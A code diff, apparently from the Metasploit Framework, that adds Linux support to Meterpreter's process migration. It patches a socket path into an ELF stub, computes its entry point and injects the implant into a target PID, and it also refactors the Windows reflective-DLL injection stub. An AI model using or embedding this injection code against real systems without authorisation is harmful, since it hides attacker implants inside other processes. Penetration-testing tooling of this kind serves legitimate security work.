sempervictus
diff --git a/‎data/meterpreter/ext_server_networkpug.lso
0 Bytes b/‎data/meterpreter/ext_server_networkpug.lso
0 Bytes
diff --git a/‎data/meterpreter/ext_server_sniffer.lso
108 Bytes b/‎data/meterpreter/ext_server_sniffer.lso
108 Bytes
diff --git a/‎data/meterpreter/ext_server_stdapi.lso
0 Bytes b/‎data/meterpreter/ext_server_stdapi.lso
0 Bytes
diff --git a/‎data/meterpreter/msflinker_linux_x86.bin
4 KB b/‎data/meterpreter/msflinker_linux_x86.bin
4 KB
diff --git a/‎lib/rex/post/meterpreter/client_core.rb
Lines changed: 151 additions & 50 deletions b/‎lib/rex/post/meterpreter/client_core.rb
Lines changed: 151 additions & 50 deletions
diff --git a/‎lib/rex/post/meterpreter/packet.rb
Lines changed: 41 additions & 38 deletions b/‎lib/rex/post/meterpreter/packet.rb
Lines changed: 41 additions & 38 deletions
diff --git a/‎lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
Lines changed: 17 additions & 4 deletions b/‎lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
Lines changed: 17 additions & 4 deletions
@@ -25,6 +25,9 @@ module Meterpreter
 ###
 class ClientCore < Extension
 
+  UNIX_PATH_MAX = 108
+  DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -180,11 +183,13 @@ def use(mod, opts = { })
   # Migrates the meterpreter instance to the process specified
   # by pid.  The connection to the server remains established.
   #
-  def migrate( pid )
+  def migrate(pid, writable_dir = nil)
     keepalive = client.send_keepalives
     client.send_keepalives = false
     process       = nil
     binary_suffix = nil
+    old_platform      = client.platform
+    old_binary_suffix = client.binary_suffix
 
     # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
     client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
@@ -202,63 +207,58 @@ def migrate( pid )
       raise RuntimeError, "Cannot migrate into non existent process", caller
     end
 
-    # We cant migrate into a process that we are unable to open
-    if process['arch'].nil? or process['arch'].empty?
-      raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
+    # We cannot migrate into a process that we are unable to open
+    # On linux, arch is empty even if we can access the process
+    if client.platform =~ /win/
+      if process['arch'] == nil || process['arch'].empty?
+        raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
+      end
     end
 
-    # And we also cant migrate into our own current process...
+    # And we also cannot migrate into our own current process...
     if process['pid'] == client.sys.process.getpid
       raise RuntimeError, "Cannot migrate into current process", caller
     end
 
-    # Create a new payload stub
-    c = Class.new( ::Msf::Payload )
-    c.include( ::Msf::Payload::Stager )
+    if client.platform =~ /linux/
+      if writable_dir.blank?
+        writable_dir = tmp_folder
+      end
 
-    # Include the appropriate reflective dll injection module for the target process architecture...
-    if process['arch'] == ARCH_X86
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
-      binary_suffix = "x86.dll"
-    elsif process['arch'] == ARCH_X86_64
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
-      binary_suffix = "x64.dll"
-    else
-      raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+      stat_dir = client.fs.filestat.new(writable_dir)
+
+      unless stat_dir.directory?
+        raise RuntimeError, "Directory #{writable_dir} not found", caller
+      end
+      # Rex::Post::FileStat#writable? isn't available
     end
 
-    # Create the migrate stager
-    migrate_stager = c.new()
+    blob = generate_payload_stub(process)
 
-    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
-    if dll.nil?
-      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
-    end
-    migrate_stager.datastore['DLL'] = dll
+    # Build the migration request
+    request = Packet.create_request( 'core_migrate' )
 
-    blob = migrate_stager.stage_payload
+    if client.platform =~ /linux/i
+      socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
 
-    if client.passive_service
+      if socket_path.length > UNIX_PATH_MAX - 1
+        raise RuntimeError, "The writable dir is too long", caller
+      end
 
-      #
-      # Patch options into metsrv for reverse HTTP payloads
-      #
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
-        :ssl            =>  client.ssl,
-        :url            =>  self.client.url,
-        :expiration     => self.client.expiration,
-        :comm_timeout   =>  self.client.comm_timeout,
-        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
-        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
-        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
-        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
-        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
-        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
+      pos = blob.index(DEFAULT_SOCK_PATH)
+
+      if pos.nil?
+        raise RuntimeError, "The meterpreter binary is wrong", caller
+      end
+
+      blob[pos, socket_path.length + 1] = socket_path + "\x00"
 
+      ep = elf_ep(blob)
+      request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
+      request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
+      request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
     end
 
-    # Build the migration request
-    request = Packet.create_request( 'core_migrate' )
     request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
     request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
     request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
@@ -307,15 +307,28 @@ def migrate( pid )
       end
     end
 
-    # Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
-    # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
-    # If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
-    if process['arch'] == ARCH_X86_64
-      client.platform      = 'x64/win64'
-      client.binary_suffix = 'x64.dll'
+    # Update the meterpreter platform/suffix for loading extensions as we may
+    # have changed target architecture
+    # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a
+    # module this is the simplest solution I could think of. If the platform
+    # specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change
+    # significantly we will need a better way to do this.
+
+    case client.platform
+    when /win/i
+      if process['arch'] == ARCH_X86_64
+        client.platform      = 'x64/win64'
+        client.binary_suffix = 'x64.dll'
+      else
+        client.platform      = 'x86/win32'
+        client.binary_suffix = 'x86.dll'
+      end
+    when /linux/i
+      client.platform        = 'x86/linux'
+      client.binary_suffix   = 'lso'
     else
-      client.platform      = 'x86/win32'
-      client.binary_suffix = 'x86.dll'
+      client.platform        = old_platform
+      client.binary_suffix   = old_binary_suffix
     end
 
     # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
@@ -348,6 +361,94 @@ def shutdown
     true
   end
 
+  private
+
+  def generate_payload_stub(process)
+    case client.platform
+    when /win/i
+      blob = generate_windows_stub(process)
+    when /linux/i
+      blob = generate_linux_stub
+    else
+      raise RuntimeError, "Unsupported platform '#{client.platform}'"
+    end
+
+    blob
+  end
+
+  def generate_windows_stub(process)
+    c = Class.new( ::Msf::Payload )
+    c.include( ::Msf::Payload::Stager )
+
+    # Include the appropriate reflective dll injection module for the target process architecture...
+    if process['arch'] == ARCH_X86
+      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
+      binary_suffix = "x86.dll"
+    elsif process['arch'] == ARCH_X86_64
+      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
+      binary_suffix = "x64.dll"
+    else
+      raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+    end
+
+    # Create the migrate stager
+    migrate_stager = c.new()
+
+    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
+    if dll.nil?
+      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
+    end
+    migrate_stager.datastore['DLL'] = dll
+
+    blob = migrate_stager.stage_payload
+
+    if client.passive_service
+
+      #
+      # Patch options into metsrv for reverse HTTP payloads
+      #
+      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
+        :ssl            =>  client.ssl,
+        :url            =>  self.client.url,
+        :expiration     => self.client.expiration,
+        :comm_timeout   =>  self.client.comm_timeout,
+        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
+        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
+        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
+        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
+        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
+        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
+
+    end
+
+    blob
+  end
+
+  def generate_linux_stub
+    file = ::File.join(Msf::Config.data_directory, "meterpreter", "msflinker_linux_x86.bin")
+    blob = ::File.open(file, "rb") {|f|
+      f.read(f.stat.size)
+    }
+
+    blob
+  end
+
+  def elf_ep(payload)
+    elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
+    ep = elf.elf_header.e_entry
+    return ep
+  end
+
+  def tmp_folder
+    tmp = client.sys.config.getenv('TMPDIR')
+
+    if tmp.blank?
+      tmp = '/tmp'
+    end
+
+    tmp
+  end
+
 end
 
 end; end; end
 
@@ -48,44 +48,47 @@ module Meterpreter
 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY                = TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD             = TLV_META_TYPE_STRING |   1
-TLV_TYPE_REQUEST_ID         = TLV_META_TYPE_STRING |   2
-TLV_TYPE_EXCEPTION          = TLV_META_TYPE_GROUP  |   3
-TLV_TYPE_RESULT             = TLV_META_TYPE_UINT   |   4
-
-
-TLV_TYPE_STRING             = TLV_META_TYPE_STRING |  10
-TLV_TYPE_UINT               = TLV_META_TYPE_UINT   |  11
-TLV_TYPE_BOOL               = TLV_META_TYPE_BOOL   |  12
-
-TLV_TYPE_LENGTH             = TLV_META_TYPE_UINT   |  25
-TLV_TYPE_DATA               = TLV_META_TYPE_RAW    |  26
-TLV_TYPE_FLAGS              = TLV_META_TYPE_UINT   |  27
-
-TLV_TYPE_CHANNEL_ID         = TLV_META_TYPE_UINT   |  50
-TLV_TYPE_CHANNEL_TYPE       = TLV_META_TYPE_STRING |  51
-TLV_TYPE_CHANNEL_DATA       = TLV_META_TYPE_RAW    |  52
-TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP  |  53
-TLV_TYPE_CHANNEL_CLASS      = TLV_META_TYPE_UINT   |  54
-TLV_TYPE_CHANNEL_PARENTID   = TLV_META_TYPE_UINT   |  55
-
-TLV_TYPE_SEEK_WHENCE        = TLV_META_TYPE_UINT   |  70
-TLV_TYPE_SEEK_OFFSET        = TLV_META_TYPE_UINT   |  71
-TLV_TYPE_SEEK_POS           = TLV_META_TYPE_UINT   |  72
-
-TLV_TYPE_EXCEPTION_CODE     = TLV_META_TYPE_UINT   | 300
-TLV_TYPE_EXCEPTION_STRING   = TLV_META_TYPE_STRING | 301
-
-TLV_TYPE_LIBRARY_PATH       = TLV_META_TYPE_STRING | 400
-TLV_TYPE_TARGET_PATH        = TLV_META_TYPE_STRING | 401
-TLV_TYPE_MIGRATE_PID        = TLV_META_TYPE_UINT   | 402
-TLV_TYPE_MIGRATE_LEN        = TLV_META_TYPE_UINT   | 403
-TLV_TYPE_MIGRATE_PAYLOAD    = TLV_META_TYPE_STRING | 404
-TLV_TYPE_MIGRATE_ARCH       = TLV_META_TYPE_UINT   | 405
-
-TLV_TYPE_CIPHER_NAME        = TLV_META_TYPE_STRING | 500
-TLV_TYPE_CIPHER_PARAMETERS  = TLV_META_TYPE_GROUP  | 501
+TLV_TYPE_ANY                 = TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD              = TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID          = TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION           = TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT              = TLV_META_TYPE_UINT   |   4
+
+
+TLV_TYPE_STRING              = TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT                = TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL                = TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH              = TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA                = TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS               = TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID          = TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE        = TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA        = TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP  = TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS       = TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_PARENTID    = TLV_META_TYPE_UINT   |  55
+
+TLV_TYPE_SEEK_WHENCE         = TLV_META_TYPE_UINT   |  70
+TLV_TYPE_SEEK_OFFSET         = TLV_META_TYPE_UINT   |  71
+TLV_TYPE_SEEK_POS            = TLV_META_TYPE_UINT   |  72
+
+TLV_TYPE_EXCEPTION_CODE      = TLV_META_TYPE_UINT   | 300
+TLV_TYPE_EXCEPTION_STRING    = TLV_META_TYPE_STRING | 301
+
+TLV_TYPE_LIBRARY_PATH        = TLV_META_TYPE_STRING | 400
+TLV_TYPE_TARGET_PATH         = TLV_META_TYPE_STRING | 401
+TLV_TYPE_MIGRATE_PID         = TLV_META_TYPE_UINT   | 402
+TLV_TYPE_MIGRATE_LEN         = TLV_META_TYPE_UINT   | 403
+TLV_TYPE_MIGRATE_PAYLOAD     = TLV_META_TYPE_STRING | 404
+TLV_TYPE_MIGRATE_ARCH        = TLV_META_TYPE_UINT   | 405
+TLV_TYPE_MIGRATE_BASE_ADDR   = TLV_META_TYPE_UINT   | 407
+TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT   | 408
+TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
+
+TLV_TYPE_CIPHER_NAME         = TLV_META_TYPE_STRING | 500
+TLV_TYPE_CIPHER_PARAMETERS   = TLV_META_TYPE_GROUP  | 501
 
 #
 # Core flags
 
@@ -69,7 +69,7 @@ def commands
     # whatever reason it is not adding core_migrate to its list of commands.
     # Use a dumb platform til it gets sorted.
     #if client.commands.include? "core_migrate"
-    if client.platform =~ /win/
+    if client.platform =~ /win/ || client.platform =~ /linux/
       c["migrate"] = "Migrate the server to another process"
     end
 
@@ -321,7 +321,11 @@ def cmd_irb(*args)
   end
 
   def cmd_migrate_help
-    print_line "Usage: migrate <pid>"
+    if client.platform =~ /linux/
+      print_line "Usage: migrate <pid> [writable_path]"
+    else
+      print_line "Usage: migrate <pid>"
+    end
     print_line
     print_line "Migrates the server instance to another process."
     print_line "NOTE: Any open channels or other dynamic state will be lost."
@@ -331,7 +335,8 @@ def cmd_migrate_help
   #
   # Migrates the server to the supplied process identifier.
   #
-  # @param args [Array<String>] Commandline arguments, only -h or a pid
+  # @param args [Array<String>] Commandline arguments, -h or a pid. On linux
+  #   platforms a path for the unix domain socket used for IPC.
   # @return [void]
   def cmd_migrate(*args)
     if ( args.length == 0 or args.include?("-h") )
@@ -345,6 +350,10 @@ def cmd_migrate(*args)
       return
     end
 
+    if client.platform =~ /linux/
+      writable_dir = (args.length >= 2) ? args[1] : nil
+    end
+
     begin
       server = client.sys.process.open
     rescue TimeoutError => e
@@ -385,7 +394,11 @@ def cmd_migrate(*args)
     server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}")
 
     # Do this thang.
-    client.core.migrate(pid)
+    if client.platform =~ /linux/
+      client.core.migrate(pid, writable_dir)
+    else
+      client.core.migrate(pid)
+    end
 
     print_status("Migration completed successfully.")